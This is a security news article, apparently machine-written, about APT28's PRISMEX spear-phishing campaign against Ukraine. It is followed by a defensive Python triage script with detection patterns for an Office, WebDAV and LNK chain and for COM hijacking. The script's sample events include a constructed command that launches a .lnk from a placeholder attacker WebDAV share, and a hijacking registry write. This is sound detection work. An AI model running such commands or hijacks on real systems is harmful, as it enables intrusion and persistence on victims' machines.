Ethical Hacking News
Russia-linked APT28 (also tracked as Pawn Storm) has deployed a new malware suite called PRISMEX in spear-phishing campaigns against Ukraine and its allies. The suite, made up of a dropper, a loader and an implant built on the Covenant framework, targets Ukraine's defense supply chain with the aim of disrupting operational planning and the support it provides to NATO-linked logistics. The attack chain abuses CVE-2026-21509 in a malicious RTF attachment to pull a LNK file from an attacker-controlled WebDAV server, with CVE-2026-21513 then used for silent follow-on execution. Stealth techniques such as steganography, COM hijacking, fileless execution and command-and-control over legitimate cloud services make the activity hard to separate from normal encrypted traffic. Both CVEs were only publicly disclosed in January 2026, months after the campaign started, which suggests the group had vulnerability details ahead of disclosure. The operation reflects an evolution of the NotDoor ecosystem, and organizations in the targeted regions and sectors should consider themselves at elevated risk and implement countermeasures now.
The Russia-linked advanced persistent threat (APT) group APT28 has recently been observed using a new malware suite called PRISMEX in a spear-phishing campaign against Ukraine and its allies. According to recent reports, the operation began in September 2025 and relies on stealth techniques such as steganography and COM hijacking to execute its payloads.
The PRISMEX malware suite consists of several components, including a dropper, loader, and implant based on the Covenant framework. This allows for fileless attacks, encrypted command-and-control, and evasion of modern security tools. The operation targets Ukraine's defense supply chain, including allies, transport, and aid networks, with a focus on disrupting the country's operational planning and support to NATO-linked logistics.
The attack chain begins with spear-phishing emails themed around military training, weather alerts, or weapon smuggling. Victims who open the attached RTF file trigger exploitation of CVE-2026-21509, which bypasses security controls and forces the system to connect to an attacker-controlled WebDAV server. This automatically retrieves and executes a malicious LNK file without further user interaction.
The LNK file may then exploit CVE-2026-21513 to bypass browser protections and execute code silently, downloading additional payloads. The malware also utilizes legitimate cloud services for command-and-control, making detection challenging due to the blending of malicious traffic with normal encrypted communications.
Researchers have attributed the operation to APT28, a group known for its highly aggressive tactics and ability to quickly weaponize newly disclosed flaws. The use of PRISMEX highlights the dual-use nature of this campaign, enabling both intelligence gathering and potential disruptive attacks aligned with military objectives.
The timeline of this campaign is telling: activity began in September 2025, yet CVE-2026-21509 and CVE-2026-21513 were not publicly disclosed until January 2026. This indicates that APT28 (also tracked as Pawn Storm) had access to vulnerability details ahead of public disclosure.
Researchers have also documented the decoy documents used for targeting, such as a malicious Excel file that displays realistic content once macros are enabled, including Ukrainian drone inventories, supplier price lists and military logistics forms. Decoys of this quality make it difficult for recipients and defenders alike to distinguish legitimate documents from malicious ones.
The operation reflects an evolution of the NotDoor ecosystem, expanding capabilities for rapid exploitation and long-term espionage. The use of PRISMEX highlights the threat actor's continuous development cycle and modular approach to capability building.
In light of this operation, organizations in the targeted geographic and industry sectors should consider themselves at elevated risk and implement countermeasures immediately. Defenders must adopt an "assume breach" mentality and focus on behavioral anomalies rather than just static indicators.
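The chain described above (Office document opens, a WebDAV share is reached, a LNK file runs, persistence lands in the registry) leaves behavioural traces that do not depend on file hashes or C2 domains. As an added example, not code from the article or from the researchers it cites, the following Python script applies three such checks to constructed Sysmon-style events: an Office application spawning a scripting host or other living-off-the-land binary, a process launched from a WebDAV UNC path (the `\\host@80\DavWWWRoot\...` form Windows uses for WebDAV), and a write to a per-user CLSID `InprocServer32` key, the registry location abused by COM hijacking. Field names follow Sysmon's process-creation (Event ID 1) and registry value-set (Event ID 13) events. The sample events, the TEST-NET IP 203.0.113.5 and the all-zero CLSID are constructed placeholders, not indicators from the campaign.

```python
"""Behavioural triage of Sysmon-style events for an Office -> WebDAV -> LNK
chain plus per-user COM hijacking.  All events below are constructed sample
data; the IP is from the TEST-NET-3 range and the CLSID is a placeholder."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "mshta.exe",
                       "wscript.exe", "cscript.exe", "regsvr32.exe", "explorer.exe",
                       "msiexec.exe", "certutil.exe"}

# Windows WebDAV UNC syntax: \\host@80\DavWWWRoot\..., \\host@SSL\..., \\host@SSL@8443\...
WEBDAV_UNC = re.compile(r"\\\\[\w.\-]+@(?:SSL|\d{2,5})(?:@\d{2,5})?\\", re.IGNORECASE)

# Sysmon renders HKCU\Software\Classes as HKU\<SID>_Classes; a write to
# ...\CLSID\{guid}\InprocServer32 there is the classic per-user COM hijack (T1546.015).
COM_HIJACK_KEY = re.compile(
    r"HKU\\[^\\]+(?:_Classes|\\Software\\Classes)\\CLSID\\\{[0-9A-F-]+\}\\InprocServer32",
    re.IGNORECASE)


def basename(win_path):
    """Last component of a Windows path, lower-cased (os.path does not split '\\' on Linux)."""
    return win_path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return a list of (rule, detail) tuples that fire on a single event."""
    hits = []
    eid = ev.get("EventID")
    if eid == 1:  # process creation
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if parent in OFFICE_APPS and child in SUSPICIOUS_CHILDREN:
            hits.append(("office_spawns_lolbin", f"{parent} -> {child}"))
        m = WEBDAV_UNC.search(cmd) or WEBDAV_UNC.search(ev.get("Image", ""))
        if m:
            rule = "webdav_lnk_launch" if ".lnk" in cmd.lower() else "webdav_unc_path"
            hits.append((rule, m.group(0)))
    elif eid == 13:  # registry value set
        target = ev.get("TargetObject", "")
        if COM_HIJACK_KEY.search(target):
            hits.append(("com_hijack_hkcu_clsid", f"{target} = {ev.get('Details', '')}"))
    return hits


def triage(events):
    """Run every rule over every event and return a flat list of findings."""
    return [{"record": ev["RecordID"], "rule": rule, "detail": detail}
            for ev in events for rule, detail in check_event(ev)]


def rules_by_record(findings):
    """Group fired rule names by record id (sorted) for reporting."""
    out = {}
    for f in findings:
        out.setdefault(f["record"], []).append(f["rule"])
    return {k: sorted(v) for k, v in out.items()}


SAMPLE_EVENTS = [
    # 1. Word spawns cmd.exe to open a .lnk on an attacker-controlled WebDAV share (constructed)
    {"RecordID": 1, "EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c start "" "\\203.0.113.5@80\DavWWWRoot\training\schedule.lnk"'},
    # 2. A DLL path written to a CLSID InprocServer32 key in the user's hive (placeholder CLSID)
    {"RecordID": 2, "EventID": 13,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001_Classes\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32\(Default)",
     "Details": r"C:\Users\analyst\AppData\Roaming\update.dll"},
    # 3. Benign: Word launches its 64-bit print helper
    {"RecordID": 3, "EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    # 4. Benign: ordinary Office settings write in the user hive
    {"RecordID": 4, "EventID": 13,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Office\16.0\Word\Options\LastPurge",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"record {f['record']}: {f['rule']} ({f['detail']})")
```

Run against the constructed events, records 1 and 2 fire while the benign print-helper launch and the Office settings write do not. In production the same rules would be fed from a SIEM export of Sysmon events rather than an inline list; the WebDAV and CLSID patterns are deliberately independent of any campaign-specific host, hash or CLSID so they keep working when the actor rotates infrastructure.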
Related Information:
https://www.ethicalhackingnews.com/articles/Russia-Linked-APT28-Deploys-Advanced-PRISMEX-Malware-to-Infiltrate-Ukraine-and-Allied-Infrastructure-ehn.shtml
https://securityaffairs.com/190510/apt/russia-linked-apt28-uses-prismex-to-infiltrate-ukraine-and-allied-infrastructure-with-advanced-tactics.html
https://undercodenews.com/russias-shadow-cyber-war-escalates-apt28-unleashes-stealthy-prismex-malware-campaign-across-europe/
https://thehackernews.com/search/label/APT28
https://attack.mitre.org/groups/G0007/
https://www.picussecurity.com/resource/blog/apt28-cyber-threat-profile-and-detailed-ttps
Published: Wed Apr 8 16:58:15 2026 by llama3.2 3B Q4_K_M